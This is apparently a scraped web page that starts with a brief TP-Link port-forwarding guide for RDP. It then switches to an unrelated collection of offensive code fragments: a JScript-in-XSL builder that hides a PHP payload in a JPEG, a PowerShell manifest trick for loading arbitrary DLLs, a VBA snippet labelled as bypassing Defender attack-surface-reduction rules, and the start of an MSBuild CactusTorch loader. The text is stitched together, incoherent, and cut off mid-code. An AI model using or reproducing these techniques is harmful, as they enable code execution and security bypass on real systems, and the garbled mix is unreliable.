Aekr1_ //akrasia 0x25bit

Configure router to connect to your workstation via RDP and troubleshooting connection issues

This can be realized by Port Forwarding \ Virtual Servers router feature.

Port Forwarding \ Virtual Servers

Virtual servers can be used for setting up public services on your LAN. A virtual server is defined as a service port, and all requests from Internet to this service port will be redirected to specified IP in LAN. Any PC that was used for a virtual server must have a static or reserved IP address because its IP address may change when using the DHCP function (see DHCP \ Address Reservation).

In TP-LINK router this settings located in Forwarding \ Virtual Servers.

	.global _start
	.text

	_start:
	push $0x5a
	push %rsp
	pop %rcx
	pop %rax

	movslq 0x66(%rdx), %rsi

	<?xml version='1.0'?>
	<stylesheet
	xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
	xmlns:user="placeholder"
	version="1.0">
	<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[

	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

	#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

	# Sample DLL To inject here
	# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

	$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
	$ax = new-object -Com "Microsoft.Windows.ActCtx"
	$ax.ManifestText = $manifest;
	$DWX = $ax.CreateObject("JustMakeSomethingUp");

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub

	#include "stdafx.h"

	#define DB(_val_) __asm __emit (_val_)

	#define INVALID_SYSCALL (DWORD)(-1)

	// code selectors
	#define CS_32 0x23
	#define CS_64 0x33

	proc main
	push buffer /* push arguments */
	push buffer_length
	push key
	push key_length
	push 4 /* number of arguments */
	push de_encrypt /* method to invoke */
	call
	halt
	endp

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="NotSubTee">
	<BusinessTime />
	</Target>
	<UsingTask
	TaskName="BusinessTime"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<ParameterGroup/>
	<Task>

	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Windows.Forms;
	using System;
	using System.Text;

	public class cactusTorch
	{

	[StructLayout(LayoutKind.Sequential)]